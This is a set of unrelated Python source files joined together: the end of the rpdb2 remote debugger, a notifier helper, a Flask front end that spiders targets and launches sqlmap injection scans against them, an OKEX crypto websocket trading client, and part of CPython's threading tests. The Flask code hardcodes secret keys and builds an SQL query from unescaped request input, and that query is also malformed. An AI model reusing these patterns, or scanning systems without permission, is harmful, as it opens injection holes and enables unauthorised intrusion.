if __name__ == 'rpdb2' and 'execve' in dir(os) and os.execve != __execve:
g_os_execve = os.execve
os.execve = __execve
def __excepthook(type, value, traceback, next_excepthook, index):
if index + 1 < len(g_excepthooks):
return next_excepthook(type, value, traceback)
if traceback.tb_frame.f_back == None:
return next_excepthook(type, value, traceback)
if not g_debugger.m_ftrap:
return next_excepthook(type, value, traceback)
settrace()
ctx = g_debugger.get_ctx(thread.get_ident())
ctx.m_fUnhandledException = True
setbreak()
#
# Debuggee breaks (pauses) here
# on unhandled exceptions.
# Use analyze mode for post mortem.
# type 'help analyze' for more information.
#
return next_excepthook(type, value, traceback)
g_excepthooks = []
g_excepthook = None
#
# Set the debugger hook for unhandled exceptions. It only kicks in on
# unhandled exceptions that are declared unhandled in the middle of the
# stack as in wxPython. Normally unhandled exceptions are trapped at the
# last stack frame by another mechanism.
#
# This mechaism is designed to work even if the excepthook is over-written.
# by the debugged script.
#
def set_excepthook():
global g_excepthook
if len(g_excepthooks) >= 4:
#
# Give up. We have been over-written 4 times already.
#
return
next_excepthook = sys.excepthook
index = len(g_excepthooks)
eh = lambda type, value, traceback: __excepthook(type, value, traceback, next_excepthook, index)
g_excepthooks.append(eh)
g_excepthook = eh
sys.excepthook = eh
def __function_wrapper(function, args, kwargs):
__settrace(depth = 1)
#
# Debuggee breaks (pauses) here
# on unhandled exceptions.
# Use analyze mode for post mortem.
# type 'help analyze' for more information.
#
return function(*args, **kwargs)
def __start_new_thread(function, args, kwargs = {}):
return g_thread_start_new_thread(__function_wrapper, (function, args, kwargs))
g_thread_start_new_thread = None
if __name__ == 'rpdb2' and 'start_new_thread' in dir(thread) and thread.start_new_thread != __start_new_thread:
g_thread_start_new_thread = thread.start_new_thread
thread.start_new_thread = __start_new_thread
#
# ---------------------------------------- main ------------------------------------
#
def __settrace(depth = 2):
if g_debugger is None:
return
f = sys._getframe(depth)
g_debugger.settrace(f, f_break_on_init = False)
def __setbreak(depth = 2):
if g_debugger is None:
return
f = sys._getframe(depth)
g_debugger.setbreak(f)
return thread.get_ident()
def __set_temp_breakpoint(path, scopename, lineno):
return g_debugger.m_bp_manager.set_temp_breakpoint(path, scopename, lineno)
def _atexit(fabort = False):
if g_fignore_atexit:
return
print_debug("Entered _atexit() in pid %d" % _getpid())
if g_debugger is None:
return
if not fabort:
g_debugger.stoptrace()
g_debugger.send_event_exit()
time.sleep(1.0)
g_server.shutdown()
g_debugger.shutdown()
if not fabort:
return
if hasattr(os, 'kill') and hasattr(signal, 'SIGKILL'):
os.kill(os.getpid(), signal.SIGKILL)
else:
os.abort()
def my_pickle_import(*args, **kwargs):
name = ''
if len(args) > 0:
name = args[0]
if 'name' in kwargs:
name = kwargs['name']
if name == 'rpdb2':
return
return __import__(*args, **kwargs)
#
# MOD
#
def workaround_import_deadlock():
if is_py3k() and hasattr(pickle, '_Pickler'):
pickle.Pickler = pickle._Pickler
xmlrpclib.loads(XML_DATA)
s = as_bytes("(S'hello'\np0\nS'world'\np1\ntp2\n.")
#s = as_bytes('(S\'\\xb3\\x95\\xf9\\x1d\\x105c\\xc6\\xe2t\\x9a\\xa5_`\\xa59\'\np0\nS"(I0\\nI1\\nS\'5657827\'\\np0\\n(S\'server_info\'\\np1\\n(tI0\\ntp2\\ntp3\\n."\np1\ntp2\n.0000000')
pickle.loads(s)
pickle.__import__ = my_pickle_import
def __start_embedded_debugger(_rpdb2_pwd, fAllowUnencrypted, fAllowRemote, timeout, source_provider, fDebug, depth):
global g_server
global g_debugger
global g_fDebug
global g_initial_cwd
global g_source_provider_aux
_rpdb2_pwd = as_unicode(_rpdb2_pwd)
try:
g_server_lock.acquire()
if g_debugger is not None and timeout == 0:
f = sys._getframe(depth)
g_debugger.settrace(f, f_break_on_init = False)
return
if g_debugger is not None:
f = sys._getframe(depth)
g_debugger.record_client_heartbeat(0, True, False)
g_debugger.setbreak(f)
return
if not is_valid_pwd(_rpdb2_pwd):
raise BadArgument(STR_PASSWORD_BAD)
g_fDebug = fDebug
g_source_provider_aux = source_provider
workaround_import_deadlock()
if (not fAllowUnencrypted) and not is_encryption_supported():
raise EncryptionNotSupported
f = sys._getframe(depth)
filename = calc_frame_path(f)
#
# This is an attempt to address the Python problem of recording only
# relative paths in __file__ members of modules in the following case.
#
if sys.path[0] == '':
try:
g_initial_cwd = [getcwd(), getcwdu()]
except UnicodeDecodeError:
#
# This exception can be raised in py3k (alpha) on nt.
#
g_initial_cwd = [getcwdu()]
atexit.register(_atexit)
g_debugger = CDebuggerEngine(fembedded = True)
g_server = CDebuggeeServer(filename, g_debugger, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote)
g_server.start()
if timeout == 0:
g_debugger.settrace(f, f_break_on_init = False)
return
g_debugger.settrace(f, timeout = timeout)
finally:
g_server_lock.release()
def StartServer(args, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid):
assert(is_unicode(_rpdb2_pwd))
global g_server
global g_debugger
global g_module_main
try:
ExpandedFilename = FindFile(args[0])
_path = g_found_unicode_files.get(ExpandedFilename, ExpandedFilename)
if fchdir:
os.chdir(os.path.dirname(_path))
if ExpandedFilename in g_found_unicode_files:
prefix = os.path.join(getcwdu(), '')
_path = _path.replace(winlower(prefix), '')
except IOError:
_print('File ' + args[0] + ' not found.')
return
print_debug('Starting server with: %s' % ExpandedFilename)
workaround_import_deadlock()
#
# Replace the rpdb2.py directory with the script directory in
# the search path
#
spe = ExpandedFilename
if os.path.islink(ExpandedFilename):
spe = os.path.realpath(ExpandedFilename)
sys.path[0] = os.path.dirname(spe)
encoding = detect_locale()
argv = [as_string(arg, encoding) for arg in args]
sys.argv = argv
atexit.register(_atexit)
g_debugger = CDebuggerEngine()
g_server = CDebuggeeServer(ExpandedFilename, g_debugger, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid)
g_server.start()
try:
g_debugger.m_bp_manager.set_temp_breakpoint(ExpandedFilename, '', 1, fhard = True)
except:
pass
f = sys._getframe(0)
g_debugger.settrace(f, f_break_on_init = False, builtins_hack = ExpandedFilename)
g_module_main = -1
del sys.modules['__main__']
#
# An exception in this line occurs if
# there is a syntax error in the debugged script or if
# there was a problem loading the debugged script.
#
imp.load_source('__main__', _path)
def StartClient(command_line, fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host):
assert(is_unicode(command_line))
assert(_rpdb2_pwd == None or is_unicode(_rpdb2_pwd))
if (not fAllowUnencrypted) and not is_encryption_supported():
_print(STR_ENCRYPTION_SUPPORT_ERROR)
return 2
sm = CSessionManager(_rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
c = CConsole(sm)
c.start()
time.sleep(1.0)
try:
if fAttach:
sm.attach(command_line)
elif command_line != '':
sm.launch(fchdir, command_line)
except (socket.error, CConnectionException):
sm.report_exception(*sys.exc_info())
except CException:
sm.report_exception(*sys.exc_info())
except:
sm.report_exception(*sys.exc_info())
print_debug_exception(True)
c.join()
sm.shutdown()
def PrintUsage(fExtended = False):
scriptName = os.path.basename(sys.argv[0])
_print(""" %(rpdb)s [options] [<script-name> [<script-args>...]]
%(rpdb)s uses the client-server model where the debugger UI/console is
the client and the debugged script is the server (also called debuggee).
The client and the server are separate processes and communicate over
sockets.
Example: The following command starts the debugger UI/console and then
launches and attaches to the specified script:
%(rpdb)s some_script.py
Options can be a combination of the following:
-h, --help Print this help.
-d, --debuggee Start the debugged script (server) and wait for a
debugger console (client) to attach.
-a, --attach Start the debugger console (client) and attach to the
specified debugged script (server).
-o, --host= Specify host (or IP address) for remote connections.
-r, --remote Allow debuggees to accept connections from remote machines.
-e, --encrypt Force encrypted socket communication.
-p, --pwd= Specify password for socket communication.
This flag is available only on Windows. On other
systems the password will be queried interactively
if it is needed.
-s, --screen Use the Unix screen utility when starting the debuggee.
Note that the debugger should be started as follows:
screen rpdb2 -s [options] [<script-name> [<script-args>...]]
-c, --chdir Change the working directory to that of the launched
script.
-v, --version Print version information.
--debug Debug prints.
Note that each option is available in short form (example -e) and in a
long form (example --encrypt).
Options that end with '=' accept an argument that should follow without
a space. For example to specify 192.168.0.10 as host use the following
option:
long form: --host=192.168.0.10
short form: -o192.168.0.10
""" % {"rpdb": scriptName})
if not fExtended:
return
_print(__doc__)
def main(StartClient_func = StartClient, version = RPDB_TITLE):
global g_fScreen
global g_fDebug
global g_fFirewallTest
create_rpdb_settings_folder()
encoding = detect_locale()
argv = [as_unicode(arg, encoding) for arg in sys.argv]
try:
options, _rpdb2_args = getopt.getopt(
argv[1:],
'hdao:rtep:scv',
['help', 'debugee', 'debuggee', 'attach', 'host=', 'remote', 'plaintext', 'encrypt', 'pwd=', 'rid=', 'screen', 'chdir', 'base64=', 'nofwtest', 'version', 'debug']
)
except getopt.GetoptError:
PrintUsage()
return 2
fWrap = False
fAttach = False
fSpawn = False
fStart = False
encoded_path = None
secret = None
host = None
_rpdb2_pwd = None
fchdir = False
fAllowRemote = False
fAllowUnencrypted = True
for o, a in options:
if o in ['-h', '--help']:
PrintUsage()
return 0
if o in ['-v', '--version']:
_print(version)
return 0
if o in ['--debug']:
g_fDebug = True
if o in ['-d', '--debugee', '--debuggee']:
fWrap = True
if o in ['-a', '--attach']:
fAttach = True
if o in ['-o', '--host']:
host = a
if o in ['-r', '--remote']:
fAllowRemote = True
if o in ['-t', '--plaintext']:
fAllowUnencrypted = True
if o in ['-e', '--encrypt']:
fAllowUnencrypted = False
if o in ['-p', '--pwd']:
_rpdb2_pwd = a
if o in ['--rid']:
secret = a
if o in ['-s', '--screen']:
g_fScreen = True
if o in ['-c', '--chdir']:
fchdir = True
if o in ['--base64']:
encoded_path = a
if o in ['--nofwtest']:
g_fFirewallTest = False
arg = None
argv = None
options = None
o = None
a = None
if (_rpdb2_pwd is not None) and (os.name != 'nt'):
_print(STR_PASSWORD_NOT_SUPPORTED)
return 2
if _rpdb2_pwd is not None and not is_valid_pwd(_rpdb2_pwd):
_print(STR_PASSWORD_BAD)
return 2
if fWrap and (len(_rpdb2_args) == 0):
_print("--debuggee option requires a script name with optional <script-arg> arguments")
return 2
if fWrap and fAttach:
_print("--debuggee and --attach can not be used together.")
return 2
if fAttach and (len(_rpdb2_args) == 0):
_print("--attach option requires a script name to attach to.")
return 2
if fAttach and (len(_rpdb2_args) > 1):
_print("--attach option does not accept <script-arg> arguments.")
return 2
if fAttach and fAllowRemote:
_print("--attach and --remote can not be used together.")
return 2
if (host is not None) and not fAttach:
_print("--host can only be used together with --attach.")
return 2
if host is None:
host = LOCALHOST
fSpawn = (len(_rpdb2_args) != 0) and (not fWrap) and (not fAttach)
fStart = (len(_rpdb2_args) == 0)
if fchdir and not (fWrap or fSpawn):
_print("-c can only be used when launching or starting a script from command line.")
return 2
assert (fWrap + fAttach + fSpawn + fStart) == 1
if fAttach and (os.name == POSIX):
try:
int(_rpdb2_args[0])
_rpdb2_pwd = read_pwd_file(_rpdb2_args[0])
delete_pwd_file(_rpdb2_args[0])
except (ValueError, IOError):
pass
if (secret is not None) and (os.name == POSIX):
_rpdb2_pwd = read_pwd_file(secret)
if (fWrap or fAttach) and not is_valid_pwd(_rpdb2_pwd):
_print(STR_PASSWORD_MUST_BE_SET)
while True:
_rpdb2_pwd = _raw_input(STR_PASSWORD_INPUT)
if is_valid_pwd(_rpdb2_pwd):
break
_print(STR_PASSWORD_BAD)
_print(STR_PASSWORD_CONFIRM)
if fWrap or fSpawn:
try:
if encoded_path != None:
_b = as_bytes(encoded_path).translate(g_safe_base64_from)
_u = base64.decodestring(_b)
_path = as_unicode(_u)
_rpdb2_args[0] = _path
FindFile(_rpdb2_args[0])
except IOError:
_print(STR_FILE_NOT_FOUND % _rpdb2_args[0])
return 2
if fWrap:
if (not fAllowUnencrypted) and not is_encryption_supported():
_print(STR_ENCRYPTION_SUPPORT_ERROR)
return 2
StartServer(_rpdb2_args, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, secret)
elif fAttach:
StartClient_func(_rpdb2_args[0], fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
elif fStart:
StartClient_func(as_unicode(''), fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
else:
if len(_rpdb2_args) == 0:
_rpdb2_args = ''
else:
_rpdb2_args = '"' + '" "'.join(_rpdb2_args) + '"'
StartClient_func(_rpdb2_args, fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
return 0
if __name__ == '__main__':
import rpdb2
#
# Debuggee breaks (pauses) here
# on unhandled exceptions.
# Use analyze mode for post mortem.
# type 'help analyze' for more information.
#
ret = rpdb2.main()
#
# Debuggee breaks (pauses) here
# before program termination.
#
# You can step to debug any exit handlers.
#
rpdb2.setbreak()
|
pluginmanager.py | #!/usr/bin/env python
import functools
def notify_stdout(msg, key=None, **kwargs):
print msg
libnotify_ids = {}
def notify_libnotify(msg, key=None, timeout=1000, **kwargs):
import dbus, wmiidbus
try:
session_bus = wmiidbus.get_session_bus(start_thread=False)
except:
return notify_stdout(msg, key, **kwargs)
proxy = session_bus.get_object('org.freedesktop.Notifications', '/org/freedesktop/Notifications')
notifications = dbus.Interface(proxy, 'org.freedesktop.Notifications')
id = libnotify_ids.get(key, 0)
id = notifications.Notify('purple-DBus-Example-2-libnotify', id, '', '', msg, [], {}, timeout)
if key is not None:
libnotify_ids[key] = id
notify = notify_libnotify
def notify_exception(arg):
"""
Decorator to catch unhandled exceptions and display some info.
Exceptions are re-raised to allow normal exception handling to occur.
"""
comment = None
def wrap1(f):
@functools.wraps(f)
def wrap2(*args, **kwargs):
try: return f(*args, **kwargs)
except Exception as e:
if hasattr(e, 'notified') and e.notified == True:
raise # Already notified, just pass back up the stack
if comment:
notify('%s %s: %s' % (e.__class__.__name__, comment, e))
else:
notify('%s: %s' % (e.__class__.__name__, e))
e.notified = True # Prevent further notify_exception wrappers from notifying this again
#raise e # If we have the interpreter up, this will still allow it to print the whole back trace
raise
return wrap2
if isinstance(arg, str):
comment = arg
return wrap1
# No comment was passed in, so we need one less level of indirection
# (arg is what we are decorating)
return wrap1(arg)
def async(func):
@functools.wraps(func)
def wrap(*args, **kwargs):
import threading
return threading.Thread(target=func, args=args, kwargs=kwargs).start()
return wrap
|
views.py | #!/usr/bin/env python
#!-*- coding:utf-8 -*-
import json
import threading
import multiprocessing
import requests
from flask import Flask,render_template,request,session,jsonify,redirect
from libs.action import SqlMapAction,Spider_Handle,Save_Success_Target
from libs.func import Tools
from libs.models import MySQLHander
from libs.action import Action
from libs.proxy import run_proxy
app = Flask(__name__)
mysql = MySQLHander()
app.config.update(dict(
DEBUG=True,
SECRET_KEY="546sdafwerxcvSERds549fwe8rdxfsaf98we1r2"
))
app.config.from_envvar('AUTOSQLI_SETTINGS', silent=True)
app.secret_key = "34$#4564dsfaWEERds/*-()^=sadfWE89SA"
SqlMap = SqlMapAction()
@app.route('/')
def index():
return render_template('index.html')
@app.route('/index')
def settings_views():
return render_template('index.html')
@app.route('/settings', methods=['GET', 'POST'])
def settings_settings_info():
return render_template('info.html')
#TODO user=session['user']
@app.route('/action/startask', methods=['GET', 'POST'])
def action_startask():
if request.method == 'GET':
return render_template('startask.html')
else:
#删除之前的任务
SqlMap.DeleteAllTask()
#转换为sqlmap的设置
options = Tools.do_sqlmap_options(request.form)
#更新整体的设置
SqlMap.update_settings(request)
#线程启动任务,后台运行,没有join
t = threading.Thread(target=Spider_Handle,args=(request.form['target'],options,))
t.start()
t = threading.Thread(target=Save_Success_Target,args=())
t.start()
return redirect('/action/showtask')
return "<html><script>alert('success add new target');window.location.href='/action/showtask';</script></html>"
return "<html><script>alert('add new target Faild');history.back();</script></html>"
@app.route('/action/showtask', methods=['GET'])
def action_showtask():
data = {"number":0, "data":[]}
if request.args.has_key('action') and request.args['action'] == "refresh":
mysql = MySQLHander()
sql = "select taskid,target,success,status from task"
mysql.query(sql)
source = mysql.fetchAllRows()
#获取正在扫描的URL
num = 0
for line in source:
num += 1
data['data'].append({"taskid":line[0], "target":line[1], "success":line[2], "status":line[3]})
data['number'] = num
mysql.close()
return json.dumps(data)
if request.args.has_key('type'):
if request.args['type'] == "log":
sqlaction = SqlMapAction()
server = sqlaction._get_server()
url = "{0}/scan/{1}/log".format(server, request.args['taskid'])
return json.dumps(Tools.getjsondata(url))
if request.args['type'] == "payload":
sqlaction = SqlMapAction()
server = sqlaction._get_server()
url = "{0}/scan/{1}/data".format(server, request.args['taskid'])
return json.dumps(Tools.getjsondata(url))
return render_template('showtask.html')
@app.route('/action/showdetail', methods=['GET'])
def action_showjson():
data = {"target":"", "data":"", "success":0, "status":"running"}
if request.args.has_key('taskid'):
taskid = request.args['taskid']
sql = "select target,data,success,status where taskid = '{0}'".format(taskid)
mysql = MySQLHander()
mysql.query(sql)
resource = mysql.fetchOneRow()
data = {"target":resource[0], "data":resource[1], "success":resource[2], "status":resource[4]}
return json.dumps(data)
@app.route('/action/stoptask')
def action_status():
if request.args['taskidlist'] != "":
taskidlist = []
if request.args['taskidlist'].find(",") > 0:
taskidlist = request.args['taskidlist'].split(',')
else:
taskidlist.append(request.args['taskidlist'])
return json.dumps({"status":SqlMap.StopTask(taskidlist)})
return json.dumps({"error":"no taskid"})
if __name__ == '__main__':
app.run() |
vnokex.py | # encoding: UTF-8
import hashlib
import zlib
import json
from time import sleep
from threading import Thread
import websocket
# OKEX网站
OKEX_USD_SPOT = 'wss://real.okex.com:10441/websocket' # OKEX 现货地址
#OKEX_USD_SPOT = 'wss://47.90.109.236:10441/websocket' # OKEX 现货地址
#OKEX_USD_SPOT = 'wss://ws.blockchain.info/inv' # OKEX 现货地址
OKEX_USD_CONTRACT = 'wss://real.okex.com:10440/websocket/okexapi' # OKEX 期货地址
SPOT_CURRENCY = ["usdt",
"btc",
"ltc",
"eth",
"etc",
"bch"]
SPOT_SYMBOL = ["ltc_btc",
"eth_btc",
"etc_btc",
"bch_btc",
"btc_usdt",
"eth_usdt",
"ltc_usdt",
"etc_usdt",
"bch_usdt",
"etc_eth",
"bt1_btc",
"bt2_btc",
"btg_btc",
"qtum_btc",
"hsr_btc",
"neo_btc",
"gas_btc",
"qtum_usdt",
"hsr_usdt",
"neo_usdt",
"gas_usdt"]
KLINE_PERIOD = ["1min",
"3min",
"5min",
"15min",
"30min",
"1hour",
"2hour",
"4hour",
"6hour",
"12hour",
"day",
"3day",
"week"]
CONTRACT_SYMBOL = ["btc",
"ltc",
"eth",
"etc",
"bch"]
CONTRACT_TYPE = ["this_week",
"next_week",
"quarter"]
########################################################################
class OkexApi(object):
"""交易接口"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.host = '' # 服务器
self.apiKey = '' # 用户名
self.secretKey = '' # 密码
self.ws = None # websocket应用对象 现货对象
self.thread = None # 初始化线程
#----------------------------------------------------------------------
def reconnect(self):
"""重新连接"""
# 首先关闭之前的连接
self.close()
# 再执行重连任务
self.ws = websocket.WebSocketApp(self.host,
on_message=self.onMessage,
on_error=self.onError,
on_close=self.onClose,
on_open=self.onOpen)
self.thread = Thread(target=self.ws.run_forever,args=(None, None,25, None,None,None,None,None,False,None,None))
self.thread.start()
#----------------------------------------------------------------------
def connect(self, apiKey, secretKey, trace=False):
self.host = OKEX_USD_SPOT
self.apiKey = apiKey
self.secretKey = secretKey
websocket.enableTrace(trace)
self.ws = websocket.WebSocketApp(self.host,
on_message=self.onMessage,
on_error=self.onError,
on_close=self.onClose,
on_open=self.onOpen)
self.thread = Thread(target=self.ws.run_forever,args=(None, None,25, None,None,None,None,None,False,None,None))
self.thread.start()
#----------------------------------------------------------------------
def readData(self, evt):
"""解码推送收到的数据"""
data = json.loads(evt)
return data
#----------------------------------------------------------------------
def close(self):
"""关闭接口"""
if self.thread and self.thread.isAlive():
self.ws.close()
self.thread.join()
#----------------------------------------------------------------------
def onMessage(self, ws, evt):
"""信息推送"""
print evt
#----------------------------------------------------------------------
def onError(self, ws, evt):
"""错误推送"""
print 'onError'
print evt
#----------------------------------------------------------------------
def onClose(self, ws):
"""接口断开"""
print 'onClose'
#----------------------------------------------------------------------
def onOpen(self, ws):
"""接口打开"""
print 'onOpen'
#----------------------------------------------------------------------
def generateSign(self, params):
"""生成签名"""
l = []
for key in sorted(params.keys()):
l.append('%s=%s' %(key, params[key]))
l.append('secret_key=%s' %self.secretKey)
sign = '&'.join(l)
return hashlib.md5(sign.encode('utf-8')).hexdigest().upper()
#----------------------------------------------------------------------
def sendTradingRequest(self, channel, params):
"""发送交易请求"""
# 在参数字典中加上api_key和签名字段
try:
params['api_key'] = self.apiKey
params['sign'] = self.generateSign(params)
# 生成请求
d = {}
d['event'] = 'addChannel'
d['channel'] = channel
d['parameters'] = params
# 使用json打包并发送
j = json.dumps(d)
print d
except Exception, e:
# raise
print e
# 若触发异常则重连
try:
self.ws.send(j)
except websocket.WebSocketConnectionClosedException:
pass
#----------------------------------------------------------------------
def sendDataRequest(self, channel):
"""发送数据请求"""
d = {}
d['event'] = 'addChannel'
d['channel'] = channel
j = json.dumps(d)
print j
# 若触发异常则重连
try:
self.ws.send(j)
except websocket.WebSocketConnectionClosedException:
pass
#----------------------------------------------------------------------
def login(self):
params = {}
params['api_key'] = self.apiKey
params['sign'] = self.generateSign(params)
# 生成请求
d = {}
d['event'] = 'login'
d['parameters'] = params
# 使用json打包并发送
j = json.dumps(d)
# 若触发异常则重连
try:
self.ws.send(j)
return True
except websocket.WebSocketConnectionClosedException:
return False
########################################################################
class OkexSpotApi(OkexApi):
"""现货交易接口"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(OkexSpotApi, self).__init__()
#----------------------------------------------------------------------
def subscribeSpotTicker(self, symbol):
"""订阅现货的Tick"""
channel = 'ok_sub_spot_%s_ticker' %symbol
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotDepth(self, symbol, depth=0):
"""订阅现货的深度"""
channel = 'ok_sub_spot_%s_depth' %symbol
if depth:
channel = channel + '_' + str(depth)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotDeals(self, symbol):
channel = 'ok_sub_spot_%s_deals' %symbol
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotKlines(self, symbol, period):
channel = 'ok_sub_spot_%s_kline_%s' %(symbol, period)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def spotTrade(self, symbol, type_, price, amount):
"""现货委托"""
params = {}
params['symbol'] = str(symbol)
params['type'] = str(type_)
params['price'] = str(price)
params['amount'] = str(amount)
channel = 'ok_spot_order'
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def spotCancelOrder(self, symbol, orderid):
"""现货撤单"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
channel = 'ok_spot_cancel_order'
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def spotUserInfo(self):
"""查询现货账户"""
channel = 'ok_spot_userinfo'
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def spotOrderInfo(self, symbol, orderid):
"""查询现货委托信息"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
channel = 'ok_spot_orderinfo'
self.sendTradingRequest(channel, params)
########################################################################
class OkexFuturesApi(OkexApi):
"""期货交易接口
交割推送信息:
[{
"channel": "btc_forecast_price",
"timestamp":"1490341322021",
"data": "998.8"
}]
data(string): 预估交割价格
timestamp(string): 时间戳
无需订阅,交割前一小时自动返回
"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(OkexFuturesApi, self).__init__()
#----------------------------------------------------------------------
def subsribeFuturesTicker(self, symbol, contractType):
"""订阅期货行情"""
channel ='ok_sub_futureusd_%s_ticker_%s' %(symbol, contractType)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeFuturesKline(self, symbol, contractType, period):
"""订阅期货K线"""
channel = 'ok_sub_futureusd_%s_kline_%s_%s' %(symbol, contractType, period)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeFuturesDepth(self, symbol, contractType, depth=0):
"""订阅期货深度"""
channel = 'ok_sub_futureusd_%s_depth_%s' %(symbol, contractType)
if depth:
channel = channel + '_' + str(depth)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeFuturesTrades(self, symbol, contractType):
"""订阅期货成交"""
channel = 'ok_sub_futureusd_%s_trade_%s' %(symbol, contractType)
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def subscribeFuturesIndex(self, symbol):
"""订阅期货指数"""
channel = 'ok_sub_futureusd_%s_index' %symbol
self.sendDataRequest(channel)
#----------------------------------------------------------------------
def futuresTrade(self, symbol, contractType, type_, price, amount, matchPrice='0', leverRate='10'):
"""期货委托"""
params = {}
params['symbol'] = str(symbol)
params['contract_type'] = str(contractType)
params['price'] = str(price)
params['amount'] = str(amount)
params['type'] = type_ # 1:开多 2:开空 3:平多 4:平空
params['match_price'] = matchPrice # 是否为对手价: 0:不是 1:是 当取值为1时,price无效
params['lever_rate'] = leverRate
channel = 'ok_futureusd_trade'
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def futuresCancelOrder(self, symbol, orderid, contractType):
"""期货撤单"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
params['contract_type'] = str(contractType)
channel = 'ok_futureusd_cancel_order'
self.sendTradingRequest(channel, params)
#----------------------------------------------------------------------
def futuresUserInfo(self):
"""查询期货账户"""
channel = 'ok_futureusd_userinfo'
self.sendTradingRequest(channel, {})
#----------------------------------------------------------------------
def futuresOrderInfo(self, symbol, orderid, contractType, status, current_page, page_length=10):
"""查询期货委托"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
params['contract_type'] = str(contractType)
params['status'] = str(status)
params['current_page'] = str(current_page)
params['page_length'] = str(page_length)
channel = 'ok_futureusd_orderinfo'
self.sendTradingRequest(channel, params)
|
test_threading.py | # Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose, cpython_only
from test.script_helper import assert_python_ok
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
try:
import _testcapi
except ImportError:
_testcapi = None
from test import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
self.skipTest('platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
self.skipTest('platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
self.skipTest('requires ctypes')
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
